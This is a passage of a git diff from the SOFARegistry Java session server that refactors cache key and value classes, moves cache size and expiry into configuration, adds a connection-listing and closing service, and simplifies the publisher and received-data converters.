"load,{},{},{},{},{}", + dataInfoId, + dataCenter, + datum.getPublishers().size(), + datum.getDataBoxBytes(), + datum.getVersion()); + } + return new Value(datum); } -} \ No newline at end of file + throw new IllegalArgumentException("unsupported key type:" + entityType); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumKey.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumKey.java index 40aae56c8..2feb80c70 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumKey.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/DatumKey.java @@ -17,69 +17,71 @@ package com.alipay.sofa.registry.server.session.cache; import com.alipay.sofa.registry.common.model.store.WordCache; +import com.alipay.sofa.registry.util.StringFormatter; /** - * * @author shangyu.wh * @version $Id: DatumKey.java, v 0.1 2018-11-19 16:08 shangyu.wh Exp $ */ public class DatumKey implements EntityType { - private final String dataInfoId; + private final String dataInfoId; - private final String dataCenter; + private final String dataCenter; - public DatumKey(String dataInfoId, String dataCenter) { - this.dataInfoId = WordCache.getInstance().getWordCache(dataInfoId); - this.dataCenter = WordCache.getInstance().getWordCache(dataCenter); - } + private final String uniqueKey; - @Override - public String getUniqueKey() { - StringBuilder sb = new StringBuilder(dataCenter); - sb.append(COMMA).append(dataInfoId); - return sb.toString(); - } + public DatumKey(String dataInfoId, String dataCenter) { + this.dataInfoId = WordCache.getWordCache(dataInfoId); + this.dataCenter = WordCache.getWordCache(dataCenter); + this.uniqueKey = WordCache.getWordCache(createUniqueKey()); + } - @Override - public int hashCode() { - String hashKey = getUniqueKey(); - return hashKey.hashCode(); - } + @Override + public String getUniqueKey() { + return uniqueKey; + } - @Override - public boolean equals(Object other) { - if (other instanceof DatumKey) { - return getUniqueKey().equals(((DatumKey) other).getUniqueKey()); - } else { - return false; - } - } + private String createUniqueKey() { + StringBuilder sb = new StringBuilder(dataCenter.length() + dataInfoId.length() + 1); + sb.append(dataCenter).append(COMMA).append(dataInfoId); + return sb.toString(); + } - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } + @Override + public int hashCode() { + return uniqueKey.hashCode(); + } - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; + @Override + public boolean equals(Object other) { + if (other instanceof DatumKey) { + return uniqueKey.equals(((DatumKey) other).uniqueKey); + } else { + return false; } + } - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("DatumKey{"); - sb.append("dataInfoId='").append(dataInfoId).append('\''); - sb.append(", dataCenter='").append(dataCenter).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + @Override + public String toString() { + return StringFormatter.format("DatumKey{{}}", uniqueKey); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/EntityType.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/EntityType.java index 72912579e..f08dc544a 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/EntityType.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/EntityType.java @@ -17,19 +17,18 @@ package com.alipay.sofa.registry.server.session.cache; /** - * * @author shangyu.wh * @version $Id: EntityType.java, v 0.1 2017-12-06 15:52 shangyu.wh Exp $ */ public interface EntityType { - /** symbol : */ - char COMMA = ','; - - /** - * cache contents uniqueKey,use for make up Key' hash code - * @return - */ - String getUniqueKey(); + /** symbol : */ + char COMMA = ','; -} \ No newline at end of file + /** + * cache contents uniqueKey,use for make up Key' hash code + * + * @return + */ + String getUniqueKey(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Key.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Key.java index c31f773e8..a5f243737 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Key.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Key.java @@ -16,93 +16,71 @@ */ package com.alipay.sofa.registry.server.session.cache; +import com.alipay.sofa.registry.util.StringFormatter; + /** * cache query condition key * * @author shangyu.wh * @version $Id: Key.java, v 0.1 2017-12-06 15:52 shangyu.wh Exp $ */ -public class Key { +public final class Key { - private String entityName; - private String hashKey; - private KeyType keyType; - private EntityType entityType; + private final String entityName; + private final String hashKey; + private final EntityType entityType; - /** - * construct func - */ - public Key(KeyType keyType, String entityName, EntityType entityType) { - this.keyType = keyType; - this.entityName = entityName; - this.entityType = entityType; - this.hashKey = this.keyType + this.entityName + this.entityType.getUniqueKey(); - } + /** construct func */ + public Key(String entityName, EntityType entityType) { + this.entityName = entityName; + this.entityType = entityType; + this.hashKey = this.entityName + this.entityType.getUniqueKey(); + } - /** - * Getter method for property entityName. - * - * @return property value of entityName - */ - public String getEntityName() { - return entityName; - } + /** + * Getter method for property entityName. + * + * @return property value of entityName + */ + public String getEntityName() { + return entityName; + } - /** - * Getter method for property hashKey. - * - * @return property value of hashKey - */ - public String getHashKey() { - return hashKey; - } + /** + * Getter method for property hashKey. + * + * @return property value of hashKey + */ + public String getHashKey() { + return hashKey; + } - /** - * Getter method for property keyType. - * - * @return property value of keyType - */ - public KeyType getKeyType() { - return keyType; - } + /** + * Getter method for property entityType. + * + * @return property value of entityType + */ + public EntityType getEntityType() { + return entityType; + } - /** - * Getter method for property entityType. - * - * @return property value of entityType - */ - public EntityType getEntityType() { - return entityType; - } + @Override + public int hashCode() { + String hashKey = getHashKey(); + return hashKey.hashCode(); + } - @Override - public int hashCode() { - String hashKey = getHashKey(); - return hashKey.hashCode(); + @Override + public boolean equals(Object other) { + if (other instanceof Key) { + return getHashKey().equals(((Key) other).getHashKey()); + } else { + return false; } + } - @Override - public boolean equals(Object other) { - if (other instanceof Key) { - return getHashKey().equals(((Key) other).getHashKey()); - } else { - return false; - } - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("{name=").append(entityName).append(", type=").append(entityType) - .append(", format=").append(keyType); - sb.append('}'); - return sb.toString(); - } - - /** - * cache data type - */ - public enum KeyType { - JSON, XML, OBJ - } -} \ No newline at end of file + @Override + public String toString() { + return StringFormatter.format("Key{{}, type={}}", entityName, entityType); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SessionCacheService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SessionCacheService.java index ba5c1aab3..fa4a805ef 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SessionCacheService.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SessionCacheService.java @@ -18,112 +18,97 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.google.common.cache.CacheBuilder; -import com.google.common.cache.CacheLoader; -import com.google.common.cache.LoadingCache; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashMap; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.cache.*; import java.util.Map; -import java.util.concurrent.ExecutionException; import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: CacheService.java, v 0.1 2017-12-06 18:22 shangyu.wh Exp $ */ public class SessionCacheService implements CacheService { + private static final Logger CACHE_LOGGER = LoggerFactory.getLogger("CACHE-GEN"); - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionCacheService.class); - - private final LoadingCache readWriteCacheMap; - /** - * injectQ - */ - private Map cacheGenerators; + private LoadingCache readWriteCacheMap; + @Autowired SessionServerConfig sessionServerConfig; + /** injectQ */ + private Map cacheGenerators; - /** - * constructor - */ - public SessionCacheService() { - this.readWriteCacheMap = CacheBuilder.newBuilder().maximumSize(1000L) - .expireAfterWrite(31000, TimeUnit.MILLISECONDS).build(new CacheLoader() { - @Override - public Value load(Key key) { + @PostConstruct + public void init() { + this.readWriteCacheMap = + CacheBuilder.newBuilder() + .maximumSize(sessionServerConfig.getCacheDatumMaxNums()) + .expireAfterWrite(sessionServerConfig.getCacheDatumExpireSecs(), TimeUnit.SECONDS) + .removalListener(new RemoveListener()) + .build( + new CacheLoader() { + @Override + public Value load(Key key) { return generatePayload(key); - } - }); - } + } + }); + } - private Value generatePayload(Key key) { - if (key == null || key.getEntityType() == null) { - throw new IllegalArgumentException("Generator key input error!"); - } - - Value value = null; - switch (key.getKeyType()) { - case OBJ: - EntityType entityType = key.getEntityType(); - CacheGenerator cacheGenerator = cacheGenerators - .get(entityType.getClass().getName()); - value = cacheGenerator.generatePayload(key); - break; - case JSON: - break; - case XML: - break; - default: - LOGGER.error("Unidentified data type: " + key.getKeyType() - + " found in the cache key."); - value = new Value(new HashMap()); - break; - } - return value; - } + static final class RemoveListener implements RemovalListener { @Override - public Value getValue(final Key key) { - Value payload = null; - try { - payload = readWriteCacheMap.get(key); - } catch (Throwable t) { - LOGGER.error("Cannot get value for key :" + key, t); + public void onRemoval(RemovalNotification notification) { + final RemovalCause cause = notification.getCause(); + if (cause == RemovalCause.SIZE || cause == RemovalCause.COLLECTED) { + Key key = notification.getKey(); + EntityType entityType = key.getEntityType(); + if (entityType instanceof DatumKey) { + DatumKey datumKey = (DatumKey) entityType; + CACHE_LOGGER.info( + "remove,{},{},{}", datumKey.getDataInfoId(), datumKey.getDataCenter(), cause); } - return payload; + } } + } - @Override - public Map getValues(final Iterable keys) { - Map valueMap = null; - try { - valueMap = readWriteCacheMap.getAll(keys); - } catch (ExecutionException e) { - LOGGER.error("Cannot get value for keys :" + keys, e); - } - return valueMap; - } + private Value generatePayload(Key key) { + ParaCheckUtil.checkNotNull(key, "generatePayload.key"); + ParaCheckUtil.checkNotNull(key.getEntityType(), "generatePayload.key.entityType"); - @Override - public void invalidate(Key... keys) { - for (Key key : keys) { - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("Invalidating the response cache key : {} {} {}", key.getEntityType(), - key.getEntityName(), key.getKeyType()); - } + EntityType entityType = key.getEntityType(); + CacheGenerator cacheGenerator = cacheGenerators.get(entityType.getClass().getName()); + return cacheGenerator.generatePayload(key); + } - readWriteCacheMap.invalidate(key); - } + @Override + public Value getValue(final Key key) throws CacheAccessException { + try { + return readWriteCacheMap.get(key); + } catch (Throwable e) { + String msg = "Cannot get value for key is:" + key; + throw new CacheAccessException(msg, e); } + } - /** - * Setter method for property cacheGenerators. - * - * @param cacheGenerators value to be assigned to property cacheGenerators - */ - @Autowired - public void setCacheGenerators(Map cacheGenerators) { - this.cacheGenerators = cacheGenerators; + @Override + public Value getValueIfPresent(Key key) { + return readWriteCacheMap.getIfPresent(key); + } + + @Override + public void invalidate(Key... keys) { + for (Key key : keys) { + readWriteCacheMap.invalidate(key); } -} \ No newline at end of file + } + + /** + * Setter method for property cacheGenerators. + * + * @param cacheGenerators value to be assigned to property cacheGenerators + */ + @Autowired + public void setCacheGenerators(Map cacheGenerators) { + this.cacheGenerators = cacheGenerators; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SubscriberResult.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SubscriberResult.java deleted file mode 100644 index cdea4d663..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/SubscriberResult.java +++ /dev/null @@ -1,81 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.cache; - -import com.alipay.sofa.registry.core.model.ScopeEnum; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberResult.java, v 0.1 2017-12-06 17:16 shangyu.wh Exp $ - */ -public class SubscriberResult implements EntityType { - - private final String dataInfoId; - - private final ScopeEnum scope; - - public SubscriberResult(String dataInfoId, ScopeEnum scope) { - this.dataInfoId = dataInfoId; - this.scope = scope; - } - - @Override - public String getUniqueKey() { - StringBuilder sb = new StringBuilder(dataInfoId); - sb.append(COMMA).append(scope); - return sb.toString(); - } - - @Override - public int hashCode() { - String hashKey = getUniqueKey(); - return hashKey.hashCode(); - } - - @Override - public boolean equals(Object other) { - if (other instanceof SubscriberResult) { - return getUniqueKey().equals(((SubscriberResult) other).getUniqueKey()); - } else { - return false; - } - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Getter method for property scope. - * - * @return property value of scope - */ - public ScopeEnum getScope() { - return scope; - } - - @Override - public String toString() { - return "SubscriberResult{" + "dataInfoId='" + dataInfoId + '\'' + ", scope=" + scope + '}'; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Value.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Value.java index a867d24ae..f0f2c980a 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Value.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/cache/Value.java @@ -24,22 +24,23 @@ */ public class Value { - private final T payload; + private final T payload; - /** - * constructor - * @param payload - */ - public Value(T payload) { - this.payload = payload; - } + /** + * constructor + * + * @param payload + */ + public Value(T payload) { + this.payload = payload; + } - /** - * Getter method for property payload. - * - * @return property value of payload - */ - public T getPayload() { - return payload; - } -} \ No newline at end of file + /** + * Getter method for property payload. + * + * @return property value of payload + */ + public T getPayload() { + return payload; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/connections/ConnectionsService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/connections/ConnectionsService.java new file mode 100644 index 000000000..73595000c --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/connections/ConnectionsService.java @@ -0,0 +1,136 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.connections; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.mapper.ConnectionMapper; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.server.session.store.Watchers; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.*; +import java.util.stream.Collectors; +import org.springframework.beans.factory.annotation.Autowired; + +public class ConnectionsService { + + @Autowired Exchange boltExchange; + + @Autowired DataStore sessionDataStore; + + @Autowired Interests sessionInterests; + + @Autowired Watchers sessionWatchers; + + @Autowired SessionServerConfig sessionServerConfig; + + @Autowired ConnectionMapper connectionMapper; + + public List getConnections() { + Server server = boltExchange.getServer(sessionServerConfig.getServerPort()); + Set boltConnectIds = + server.getChannels().stream() + .map( + channel -> + channel.getRemoteAddress().getAddress().getHostAddress() + + ":" + + channel.getRemoteAddress().getPort()) + .collect(Collectors.toSet()); + Set connectIds = new HashSet<>(); + connectIds.addAll( + sessionDataStore.getConnectIds().stream() + .map(connectId -> connectId.clientAddress()) + .collect(Collectors.toList())); + connectIds.addAll( + sessionInterests.getConnectIds().stream() + .map(connectId -> connectId.clientAddress()) + .collect(Collectors.toList())); + connectIds.addAll( + sessionWatchers.getConnectIds().stream() + .map(connectId -> connectId.clientAddress()) + .collect(Collectors.toList())); + connectIds.retainAll(boltConnectIds); + return new ArrayList<>(connectIds); + } + /** + * get connectIds by ip list + * + * @param _ipList ip list + * @return + */ + public List getIpConnects(List _ipList) { + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + if (sessionServer == null) { + return Collections.emptyList(); + } + List connections = Lists.newArrayList(); + Set ipSet = Sets.newHashSet(_ipList); + Collection channels = sessionServer.getChannels(); + for (Channel channel : channels) { + String key = NetUtil.toAddressString(channel.getRemoteAddress()); + String ip = getIpFromConnectId(key); + if (ipSet.contains(ip)) { + connections.add(ConnectId.of(key, NetUtil.toAddressString(channel.getLocalAddress()))); + } + } + + return connections; + } + + /** + * close ip connects + * + * @param _ipList ip list + * @return + */ + public List closeIpConnects(List _ipList) { + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + if (sessionServer == null) { + return Collections.emptyList(); + } + List connections = new ArrayList<>(); + Collection channels = sessionServer.getChannels(); + Set ipSet = Sets.newHashSet(_ipList); + for (Channel channel : channels) { + String key = NetUtil.toAddressString(channel.getRemoteAddress()); + String ip = getIpFromConnectId(key); + if (ipSet.contains(ip)) { + sessionServer.close(channel); + connections.add( + key + + ValueConstants.CONNECT_ID_SPLIT + + NetUtil.toAddressString(channel.getLocalAddress())); + } + } + return connections; + } + + private String getIpFromConnectId(String connectId) { + if (connectionMapper.contains(connectId)) { + return connectionMapper.get(connectId); + } else { + return connectId.substring(0, connectId.indexOf(':')); + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/Converter.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/Converter.java index 698871dc6..0d834fc7c 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/Converter.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/Converter.java @@ -17,14 +17,11 @@ package com.alipay.sofa.registry.server.session.converter; /** - * * @author shangyu.wh * @version $Id: Converter.java, v 0.1 2017-11-29 11:55 shangyu.wh Exp $ - * - * source type - * target type + *

source type target type */ public interface Converter { - T convert(S source); -} \ No newline at end of file + T convert(S source); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/PublisherConverter.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/PublisherConverter.java index 472955b54..c110bdcc0 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/PublisherConverter.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/PublisherConverter.java @@ -23,67 +23,71 @@ import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.PublisherRegister; - import java.util.ArrayList; import java.util.List; /** - * * @author shangyu.wh * @version $Id: PublisherConvert.java, v 0.1 2017-11-30 17:54 shangyu.wh Exp $ */ -public class PublisherConverter { - - /** - * PublisherRegister to Publisher - * - * @param publisherRegister - * @return - */ - public static Publisher convert(PublisherRegister publisherRegister) { +public final class PublisherConverter { + private PublisherConverter() {} - Converter messageToData = source -> { - Publisher publisher = new Publisher(); + private static final Converter publisherConverter = + source -> { + Publisher publisher = new Publisher(); - publisher.setAppName(source.getAppName()); - //ZONE MUST BE CURRENT SESSION ZONE - publisher.setCell(source.getZone()); - publisher.setClientId(source.getClientId()); - publisher.setDataId(source.getDataId()); - publisher.setGroup(source.getGroup()); - publisher.setInstanceId(source.getInstanceId()); - publisher.setRegisterId(source.getRegistId()); - publisher.setProcessId(source.getProcessId()); - publisher.setVersion(source.getVersion()); + fillCommonRegion(publisher, source); + publisher.setDataList(convert(source.getDataList())); - //registerTimestamp must happen from server,client time maybe different cause pub and unPublisher fail - publisher.setRegisterTimestamp(System.currentTimeMillis()); + return publisher; + }; - publisher.setClientRegisterTimestamp(source.getTimestamp()); - publisher.setSourceAddress(new URL(source.getIp(), source.getPort())); + public static void fillCommonRegion(Publisher publisher, PublisherRegister source) { + publisher.setAppName(source.getAppName()); + // ZONE MUST BE CURRENT SESSION ZONE + publisher.setCell(source.getZone()); + publisher.setClientId(source.getClientId()); + publisher.setDataId(source.getDataId()); + publisher.setGroup(source.getGroup()); + publisher.setInstanceId(source.getInstanceId()); + publisher.setRegisterId(source.getRegistId()); + publisher.setProcessId(source.getProcessId()); + if (source.getVersion() != null) { + publisher.setVersion(source.getVersion()); + } - publisher.setClientVersion(ClientVersion.StoreData); + // registerTimestamp must happen from server,client time maybe different cause pub and + // unPublisher fail + publisher.setRegisterTimestamp(System.currentTimeMillis()); - DataInfo dataInfo = new DataInfo(source.getInstanceId(), source.getDataId(), - source.getGroup()); - publisher.setDataInfoId(dataInfo.getDataInfoId()); + publisher.setClientRegisterTimestamp(source.getTimestamp()); + publisher.setSourceAddress(new URL(source.getIp(), source.getPort())); + publisher.setAttributes(source.getAttributes()); + publisher.setClientVersion(ClientVersion.StoreData); - publisher.setDataList(convert(source.getDataList())); + DataInfo dataInfo = new DataInfo(source.getInstanceId(), source.getDataId(), source.getGroup()); + publisher.setDataInfoId(dataInfo.getDataInfoId()); + } - return publisher; - }; - return messageToData.convert(publisherRegister); - } + /** + * PublisherRegister to Publisher + * + * @param publisherRegister + * @return + */ + public static Publisher convert(PublisherRegister publisherRegister) { + return publisherConverter.convert(publisherRegister); + } - public static List convert(List boxList) { - List serverDataBoxes = new ArrayList<>(); - if (null != boxList) { - for (DataBox dataBox : boxList) { - ServerDataBox serverDataBox = new ServerDataBox(ServerDataBox.getBytes(dataBox - .getData())); - serverDataBoxes.add(serverDataBox); - } - } - return serverDataBoxes; + public static List convert(List boxList) { + List serverDataBoxes = new ArrayList<>(); + if (null != boxList) { + for (DataBox dataBox : boxList) { + ServerDataBox serverDataBox = new ServerDataBox(ServerDataBox.getBytes(dataBox.getData())); + serverDataBoxes.add(serverDataBox); + } } -} \ No newline at end of file + return serverDataBoxes; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverter.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverter.java index 5280cc0a5..e55c26a4c 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverter.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/ReceivedDataConverter.java @@ -17,249 +17,121 @@ package com.alipay.sofa.registry.server.session.converter; import com.alipay.sofa.registry.common.model.ServerDataBox; -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.dataserver.Datum; import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.SubPublisher; import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.ReceivedConfigData; import com.alipay.sofa.registry.core.model.ReceivedData; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; - +import com.alipay.sofa.registry.util.DatumVersionUtil; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; -import java.util.Map.Entry; import java.util.function.Predicate; /** * The type Received data converter. + * * @author shangyu.wh * @version $Id : ReceivedDataConverter.java, v 0.1 2017-12-13 13:42 shangyu.wh Exp $ */ -public class ReceivedDataConverter { - private static final Logger LOGGER = LoggerFactory.getLogger(ReceivedDataConverter.class); - - /** - * convert for no datum from data node,just use for first get no datum - * if push empty data to subscriber must reset version,avoid client ignore this empty push - * @param dataId - * @param group - * @param instanceId - * @param dataCenter - * @param scope - * @param subscriberRegisterIdList - * @param regionLocal - * @return - */ - public static ReceivedData getReceivedDataMulti(String dataId, String group, String instanceId, - String dataCenter, ScopeEnum scope, - List subscriberRegisterIdList, - String regionLocal) { - ReceivedData receivedData = new ReceivedData(); - receivedData.setDataId(dataId); - receivedData.setGroup(group); - receivedData.setInstanceId(instanceId); - receivedData.setSubscriberRegistIds(subscriberRegisterIdList); - receivedData.setSegment(dataCenter); - receivedData.setScope(scope.name()); - //no datum set return version as mini as,avoid old client check - receivedData.setVersion(ValueConstants.DEFAULT_NO_DATUM_VERSION); - - receivedData.setLocalZone(regionLocal); - - Map> swizzMap = new HashMap<>(); - receivedData.setData(swizzMap); - return receivedData; +public final class ReceivedDataConverter { + private static final Logger LOGGER = LoggerFactory.getLogger(ReceivedDataConverter.class); + + private ReceivedDataConverter() {} + /** + * Standard RunEnv + * + * @param datum the datum + * @param scope the scope + * @param subscriberRegisterIdList the subscriber register id list + * @param regionLocal the region local + * @return received data multi + */ + public static ReceivedData getReceivedDataMulti( + SubDatum datum, + ScopeEnum scope, + List subscriberRegisterIdList, + String regionLocal, + Predicate zonePredicate) { + + if (null == datum) { + return null; } - /** - * Standard RunEnv - * @param datum the datum - * @param scope the scope - * @param subscriberRegisterIdList the subscriber register id list - * @param regionLocal the region local - * @return received data multi - */ - public static ReceivedData getReceivedDataMulti(Datum datum, ScopeEnum scope, - List subscriberRegisterIdList, - String regionLocal, - Predicate zonePredicate) { - - if (null == datum) { - return null; - } - - // todo judge server mode to decide local region - ReceivedData receivedData = new ReceivedData(); - receivedData.setDataId(datum.getDataId()); - receivedData.setGroup(datum.getGroup()); - receivedData.setInstanceId(datum.getInstanceId()); - receivedData.setSubscriberRegistIds(subscriberRegisterIdList); - receivedData.setSegment(datum.getDataCenter()); - receivedData.setScope(scope.name()); - - receivedData.setVersion(datum.getVersion()); - - receivedData.setLocalZone(regionLocal); - - Map> swizzMap = new HashMap<>(); - - Map publisherMap = datum.getPubMap(); - if (publisherMap == null || publisherMap.isEmpty()) { - receivedData.setData(swizzMap); - return receivedData; - } - for (Entry entry : publisherMap.entrySet()) { - Publisher publisher = entry.getValue(); - List datas = publisher.getDataList(); - - String region = publisher.getCell(); - - if (zonePredicate.test(region)) { - continue; - } + // todo judge server mode to decide local region + ReceivedData receivedData = new ReceivedData(); + receivedData.setDataId(datum.getDataId()); + receivedData.setGroup(datum.getGroup()); + receivedData.setInstanceId(datum.getInstanceId()); + receivedData.setSubscriberRegistIds(subscriberRegisterIdList); + receivedData.setSegment(datum.getDataCenter()); + receivedData.setScope(scope.name()); - if (null == datas) { - datas = new ArrayList<>(); - } + receivedData.setVersion(datum.getVersion()); - List regionDatas = swizzMap.computeIfAbsent(region, k -> new ArrayList<>()); - fillRegionDatas(regionDatas, datas); + receivedData.setLocalZone(regionLocal); - } + Map> swizzMap = new HashMap<>(); - receivedData.setData(swizzMap); - - return receivedData; - } - - private static void fillRegionDatas(List regionDatas, List datas) { - for (ServerDataBox data : datas) { - DataBox box = new DataBox(); - try { - String dataString = (String) data.extract(); - box.setData(dataString); - regionDatas.add(box); - } catch (Exception e) { - LOGGER.error("ReceivedData convert error", e); - } - } + List publishers = datum.getPublishers(); + if (publishers.isEmpty()) { + receivedData.setData(swizzMap); + return receivedData; } + for (SubPublisher publisher : publishers) { + List datas = publisher.getDataList(); - /** - * Cloud RunEnv - * @param datums the datums - * @param scope the scope - * @param subscriberRegisterIdList the subscriber register id list - * @param subscriber decide common info - * @return received data multi - */ - public static ReceivedData getReceivedDataMulti(Map datums, ScopeEnum scope, - List subscriberRegisterIdList, - Subscriber subscriber) { - ReceivedData receivedData = new ReceivedData(); - receivedData.setDataId(subscriber.getDataId()); - receivedData.setGroup(subscriber.getGroup()); - receivedData.setInstanceId(subscriber.getInstanceId()); - receivedData.setSubscriberRegistIds(subscriberRegisterIdList); - receivedData.setSegment(ValueConstants.DEFAULT_DATA_CENTER); - receivedData.setScope(scope.name()); - - String regionLocal = subscriber.getCell(); - receivedData.setLocalZone(regionLocal); - - receivedData.setVersion(System.currentTimeMillis()); - - Map> swizzMap = new HashMap<>(); - - for (Entry entry : datums.entrySet()) { - Datum datum = entry.getValue(); + String region = publisher.getCell(); - Map publisherMap = datum.getPubMap(); - if (publisherMap == null || publisherMap.isEmpty()) { - continue; - } + if (zonePredicate.test(region)) { + continue; + } - for (Entry publishers : publisherMap.entrySet()) { - Publisher publisher = publishers.getValue(); - List datas = publisher.getDataList(); + if (null == datas) { + datas = new ArrayList<>(); + } - String region = publisher.getCell(); - - if (ScopeEnum.zone == scope && !regionLocal.equals(region)) { - // zone scope subscribe only return zone list - continue; - } - - if (null == datas) { - datas = new ArrayList<>(); - } - - List regionDatas = swizzMap.computeIfAbsent(region, - k -> new ArrayList<>()); - fillRegionDatas(regionDatas, datas); - - } - } - - receivedData.setData(swizzMap); - return receivedData; + List regionDatas = swizzMap.computeIfAbsent(region, k -> new ArrayList<>()); + fillRegionDatas(regionDatas, datas); } - /** - * Gets merge datum. - * - * @param datumMap the datum map - * @return the merge datum - */ - public static Datum getMergeDatum(Map datumMap) { - Datum merge = null; - Map mergePublisherMap = new HashMap<>(); - long version = 0; - for 